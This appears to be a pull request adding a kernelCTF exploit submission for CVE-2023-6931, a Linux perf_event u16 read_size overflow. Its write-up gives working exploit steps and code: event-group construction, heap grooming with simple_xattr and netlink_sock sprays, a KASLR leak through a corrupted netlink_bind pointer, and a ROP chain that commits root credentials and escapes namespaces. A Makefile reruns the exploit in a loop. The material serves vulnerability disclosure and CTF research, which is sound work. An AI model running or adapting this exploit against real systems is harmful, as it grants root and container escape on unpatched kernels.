Add kernelCTF CVE-2023-6931_lts_cos #135

160 changes: 160 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6931_lts_cos/docs/exploit.md
@@ -0,0 +1,160 @@
# CVE-2023-6931
## Overview

The vulnerability allows multiple out-of-bounds increments at controlled offsets past the end of an array. We groom the heap so that a `netlink_sock` object sits in the slot directly after the vulnerable array, then increment two of its function pointers. One of the modified pointers is called to bypass KASLR and the other to execute a ROP chain placed in the slot previously occupied by the vulnerable array.

## Performance Counters Background

The `perf_event_open()` syscall is used to measure information about a target process. The `perf_event_attr` argument specifies what to measure in the `.type` and `.config` fields. Since the kernelCTF instances are virtualized, only events that use the software PMU (`.type = PERF_TYPE_SOFTWARE` or `.type = PERF_TYPE_BREAKPOINT`) can be created. We will use events with `.type = PERF_TYPE_SOFTWARE` and `.config = PERF_COUNT_SW_PAGE_FAULTS` to count the number of page faults in the exploit process.

`perf_event_open()` returns a file descriptor which can be `read()` to get the event count. The perf event will only perform measurements while it is active. It can be activated and deactivated with `ioctl()` or the `.disabled` field in `perf_event_attr`.
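
As a rough, self-contained sketch (not taken from the exploit), a software page-fault counter for the calling process can be set up like this:

```
#include <linux/perf_event.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

int count_page_faults(void)
{
    struct perf_event_attr attr = {
        .type = PERF_TYPE_SOFTWARE,
        .config = PERF_COUNT_SW_PAGE_FAULTS,
        .size = sizeof(struct perf_event_attr),
        .disabled = 1,
    };

    /* measure the calling process (pid 0) on any CPU, not part of a group */
    int fd = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);

    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    /* ... code that page faults runs here ... */
    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);

    uint64_t count;
    read(fd, &count, sizeof(count)); /* page faults counted while enabled */
    return fd;
}
```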

Events can be created as part of a group by passing the file descriptor of a group leader event to `perf_event_open()`. Events in the group are only measured while the group leader is also active. If an event in the group has the `PERF_FORMAT_GROUP` flag in its `perf_event_attr`'s `.read_format` field, `read()`ing it outputs an array with the counts of all events in the group. The out-of-bounds increments occur while preparing this array in `perf_read_group()`.
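
With `.read_format = PERF_FORMAT_GROUP` and no other format flags set, the buffer returned by `read()` has roughly this layout (see `perf_event_open(2)`):

```
struct read_format_group {
    uint64_t nr;       /* number of events in the group, leader included */
    uint64_t values[]; /* one count per event: leader first, then siblings */
};
```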

## Setting up the Vulnerable Event Group

We want to create an event group large enough to overflow the group leader's 16-bit `read_size`, which is passed to `kmalloc()` in `perf_read_group()` to allocate the `values` array. Each event takes up 8 bytes of `values` after an 8-byte header, so 8191 events will make `read_size` overflow. Adding 256 more events sets `read_size` to 2048 so that `values` is allocated in `kmalloc-2048`.
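
Concretely, with only `PERF_FORMAT_GROUP` set, `read_size` is 8 bytes for the member count plus 8 bytes per group member:

```
8 + 8 * 8191 = 65536  ->  wraps to 0 in the u16 read_size
8 + 8 * 8447 = 67584  ->  wraps to 2048, so values lands in kmalloc-2048
```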

The group leader is created with `read_format = PERF_FORMAT_GROUP` so that `perf_read_group()` is used when reading it, and the rest of the events are created with `read_format = 0` to avoid checks that prevent the group leader's `read_size` from overflowing:

```
/* Create group leader event */
attr.read_format = PERF_FORMAT_GROUP;
attr.disabled = 0;
sib_fds[0] = perf_event_open(&attr, ppid, -1, -1, 0);

/* Create sibling events */
attr.read_format = 0;
attr.disabled = 1;
/* ... */
```

The `perf_event` associated with `sib_fds[n]` will have its `count` field added to `values[n+1]` in `perf_read_group()`, so the events from `sib_fds[255]` to `sib_fds[510]` do out-of-bounds increments on the slot directly after `values`. We want to increment two locations in this slot, corresponding to the event fds `TFD1` and `TFD2` in the exploit.

We create the events up to `TFD2` and then set the `count` fields of `TFD1` and `TFD2` using `inc_counters()`:

```
for (int i = 1; i <= TFD2; i++)
    sib_fds[i] = perf_event_open(&attr, ppid, -1, sib_fds[0], 0);

inc_counters(sib_fds[TFD1], NUM_INCS1);
inc_counters(sib_fds[TFD2], NUM_INCS2);
```

Since the events are created with `attr.config = PERF_COUNT_SW_PAGE_FAULTS`, their `count` is incremented every time the measured process takes a page fault. `inc_counters()` enables the passed event, performs the required number of page faults, then disables the event:

```
void inc_counters(int fd, int inc) {
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    for (int i = 0; i < inc; i++) {
        char *m = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
        m[0] = 0; /* Page fault */
    }
    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
}
```
After this the rest of the events are created. The target instances have a hard limit of 4096 open file descriptors for each process, so more processes are forked off to create enough events. Three processes create 2048 events each:

```
for (int i = 0; i < 3; i++) {
    pid_t cpid = fork();
    if (cpid)
        continue; /* parent: go fork the next child */
    /* child: create 2048 sibling events, then park forever */
    for (int j = 1; j <= 2048; j++)
        sib_fds[j] = perf_event_open(&attr, ppid, -1, sib_fds[0], 0);
    sleep(-1);
}
```
The parent process can check how many sibling events have been created by calling `read()` on the group leader. This is used to wait for the child processes to finish:
```
while (num_events <= 2048*3 + TFD2) {
    read(sib_fds[0], read_buf, 65536);
    num_events = read_buf[0]; /* first u64 is the number of events in the group */
}
```
The final events are then created in the parent process, overflowing `read_size`. Now `read()`ing the group leader will allocate a `values` array and do out-of-bounds increments at the chosen offsets.

## Preparing the Heap

The vulnerable array should be allocated into a slab that has exactly one empty slot, with every other slot containing a `netlink_sock` object. Since the `kmalloc-2048` cache where `netlink_sock` is allocated has 16 slots per slab, the array then has a 15 in 16 chance of being directly followed by a `netlink_sock` within the slab.

This is achieved in three steps:

### Fill Partial Slabs

A large number of `simple_xattr` objects are allocated in `kmalloc-2048` to fill the existing partial slabs. An unknown number of `simple_xattr`s will be left over in the active slab of the current CPU.
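
One `simple_xattr` can be allocated per `setxattr()` call on a tmpfs file. A minimal sketch, assuming the tmpfs mount accepts `user.*` xattrs; the path, attribute names and value size are illustrative, with the value size chosen so that the `simple_xattr` header plus value lands in `kmalloc-2048`:

```
#include <stdio.h>
#include <sys/xattr.h>

void spray_simple_xattr(int count)
{
    static char value[2000]; /* small simple_xattr header + 2000 bytes -> kmalloc-2048 */
    char name[64];

    for (int i = 0; i < count; i++) {
        snprintf(name, sizeof(name), "user.spray_%d", i);
        /* each new attribute allocates one simple_xattr holding the value */
        setxattr("/tmp/xattr_spray", name, value, sizeof(value), XATTR_CREATE);
    }
}
```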

### Create Target Slabs

We want to create a number of target slabs greater than the number of objects per slab (see the next section for why). There are 16 objects per slab in `kmalloc-2048`, so creating `2*16*16` `netlink_sock` objects is more than enough. One in 16 of the allocated `netlink_sock`s are freed, leaving us with 31 slabs that all have one free slot and 15 slots containing a `netlink_sock`. Unless we happened to exactly fill all partial slabs in the first step, the 32nd slab created (which will be the active slab) will have more than one empty slot.

`netlink_sock` is freed after an RCU delay, so `membarrier(MEMBARRIER_CMD_GLOBAL, 0)` is used to wait for the `netlink_sock`s to be freed before continuing. The originally submitted exploit used a more complicated approach to achieve the same heap state without freeing any `netlink_sock`s, avoiding this wait, but this did not actually improve reliability over the simpler method used here.
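
A sketch of this step, with illustrative constants; `NETLINK_ROUTE` sockets are used so that `netlink_bind` points to `rtnetlink_bind()`:

```
#include <linux/membarrier.h>
#include <linux/netlink.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#define NUM_TARGET_SOCKS (2 * 16 * 16)

int nl_fds[NUM_TARGET_SOCKS];

void make_target_slabs(void)
{
    /* each socket allocates one netlink_sock in kmalloc-2048 */
    for (int i = 0; i < NUM_TARGET_SOCKS; i++)
        nl_fds[i] = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);

    /* free one object per group of 16, leaving one hole per slab
     * (assuming the allocations filled fresh slabs in order) */
    for (int i = 0; i < NUM_TARGET_SOCKS; i += 16)
        close(nl_fds[i]);

    /* netlink_sock is freed after an RCU grace period;
     * MEMBARRIER_CMD_GLOBAL is used to wait for one */
    syscall(SYS_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);
}
```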

### Fill the Active Slab

The active slab has an unknown number of empty slots which have to be filled to reach the target slab at the head of the partial slab list. Enough `simple_xattr`s are sprayed to fill the active slab. Some of them will overflow into the empty slots of target slabs after the active slab is filled, which is why it was necessary to create more target slabs than there are objects per slab.

## Triggering the Vulnerability

`read()`ing the group leader allocates the `values` array in `kmalloc-2048` and increments two locations in the next slot, corresponding to the `netlink_bind` and `sk.sk_write_space` fields of `netlink_sock`. Before being incremented these are set to `rtnetlink_bind()` and `sock_def_write_space()`, respectively.

`netlink_bind` is incremented by `0x0f` and will be called to leak the kernel base. `sk.sk_write_space` is incremented to point to `__sk_destruct()` and will be called to execute a ROP chain.

The `values` array is freed in `perf_read_group()` immediately after it does the OOB increments.

## KASLR Bypass

Here we exploit the fact that `rax` is used to store both the return value and the jump target of an indirect call. Adding `0x0f` to `rtnetlink_bind()` points it at the nearest return instruction, so calling `rtnetlink_bind + 0x0f` simply returns without doing anything. The return value in `eax` will contain the lower 32 bits of `rtnetlink_bind + 0x0f`, from which the kernel base address can be inferred.

The `netlink_bind` pointer of a `netlink_sock` is called by `netlink_setsockopt()` during the system call `setsockopt(sockfd, SOL_NETLINK, NETLINK_ADD_MEMBERSHIP, optval, optlen)`. When our corrupted pointer is called this way and returns the lower 32 bits of `rtnetlink_bind + 0x0f`, it is interpreted as an error code and passed to user space in the return value of `setsockopt()`.

If none of the sprayed `netlink_sock`s returns such an error, we know that the OOB increments did not hit a `netlink_sock`. Since whatever memory they did increment did not crash the kernel, we can simply try again.
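
A sketch of the leak loop; the fd array and `RTNETLINK_BIND_OFF` (the symbol's offset from the kernel base in the target build) are illustrative, and the raw syscall is used so that libc's errno handling does not mangle the large negative return value:

```
#include <linux/netlink.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SOL_NETLINK
#define SOL_NETLINK 270
#endif

#define RTNETLINK_BIND_OFF 0x0 /* placeholder: fill in for the target kernel */

uint64_t leak_kernel_base(int *nl_fds, int count)
{
    int grp = 1;

    for (int i = 0; i < count; i++) {
        long ret = syscall(SYS_setsockopt, nl_fds[i], SOL_NETLINK,
                           NETLINK_ADD_MEMBERSHIP, &grp, sizeof(grp));
        if (ret == 0 || (ret < 0 && ret > -4096))
            continue; /* normal success or a genuine errno */

        /* ret carries the low 32 bits of rtnetlink_bind + 0x0f */
        uint64_t low = (uint32_t)ret;
        return (0xffffffff00000000UL | low) - 0x0f - RTNETLINK_BIND_OFF;
    }
    return 0; /* the increments missed every netlink_sock: retry */
}
```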

## ROP Chain

After being incremented, `sk.sk_write_space` points to `__sk_destruct()`. It can be called via `sk_setsockopt()` using the syscall `setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, optval, optlen)`.
`__sk_destruct()` may be scheduled with `call_rcu()`, so it takes an `rcu_head *head` argument and uses `container_of(head, struct sock, sk_rcu)` to get a `sock` pointer:

```
static void __sk_destruct(struct rcu_head *head)
{
    struct sock *sk = container_of(head, struct sock, sk_rcu);
    struct sk_filter *filter;

    if (sk->sk_destruct)
        sk->sk_destruct(sk);

    /* ... */
}
```


When we call `__sk_destruct()` through `sk.sk_write_space`, `head` points to the base of the victim `netlink_sock` rather than to its `sk_rcu` field. `container_of()` therefore subtracts the offset of `sk_rcu` within `struct sock` from that address and returns a pointer into the middle of the previous slot, which used to contain the vulnerable `values` array.

We spray `simple_xattr`s to fill this slot with a fake `sock` containing a ROP chain. `__sk_destruct()` calls the `sk_destruct` function pointer of the fake `sock`, which we set to the address of a stack-pivot gadget. At the time of the call, `rbp` holds the address of the fake `sock`, so the gadget pivots the stack to the ROP chain placed at its start:

```
mov rsp, rbp ; pop rbp ; jmp __x86_return_thunk
```

The ROP chain performs privilege escalation and a namespace escape, then ends with a [telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/index.html):

```
0                                                 ; popped into rbp by the pivot gadget
pop rdi ; jmp __x86_return_thunk
0                                                 ; rdi = 0
prepare_kernel_cred()                             ; rax = prepare_kernel_cred(0)
mov rdi, rax ; pop rbx ; jmp __x86_return_thunk   ; rdi = cred
0                                                 ; dummy for pop rbx
commit_creds()                                    ; commit_creds(cred)
pop rdi ; jmp __x86_return_thunk
1                                                 ; rdi = 1
find_task_by_vpid()                               ; rax = task with vpid 1
pop rsi ; jmp __x86_return_thunk
init_nsproxy                                      ; rsi = &init_nsproxy
mov rdi, rax ; pop rbx ; jmp __x86_return_thunk   ; rdi = task
0                                                 ; dummy for pop rbx
switch_task_namespaces()                          ; switch_task_namespaces(task, &init_nsproxy)
do_sys_vfork()                                    ; telefork: the child returns to user space
msleep()                                          ; never return from the hijacked context
```
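
For completeness, a sketch of kicking off the chain on the corrupted socket found during the leak step (`victim_fd` is illustrative); the `SO_SNDBUF` path in `sk_setsockopt()` ends with a call to `sk->sk_write_space(sk)`:

```
int sndbuf = 0x4000; /* the value itself does not matter, only the callback */
setsockopt(victim_fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf));
```
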
@@ -0,0 +1,5 @@
When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_event_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group also increases and is not checked. An integer overflow can therefore be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows.

`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation.
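
Paraphrased (not the exact kernel source), the pattern in `perf_read_group()`/`__perf_read_group_add()` is roughly:

```
u64 *values = kzalloc(event->read_size, GFP_KERNEL); /* read_size has already wrapped */
int n = 0;

values[n++] = 1 + leader->nr_siblings;
values[n++] += perf_event_count(leader);
for_each_sibling_event(sub, leader)
    values[n++] += perf_event_count(sub); /* n runs far past the undersized buffer */
```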

The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in 3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 ("perf: Fix perf_event_validate_size()")` in 6.7.
@@ -0,0 +1,6 @@
CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-int-conversion -static

exploit: exploit.c

run:
	while :; do ./exploit; done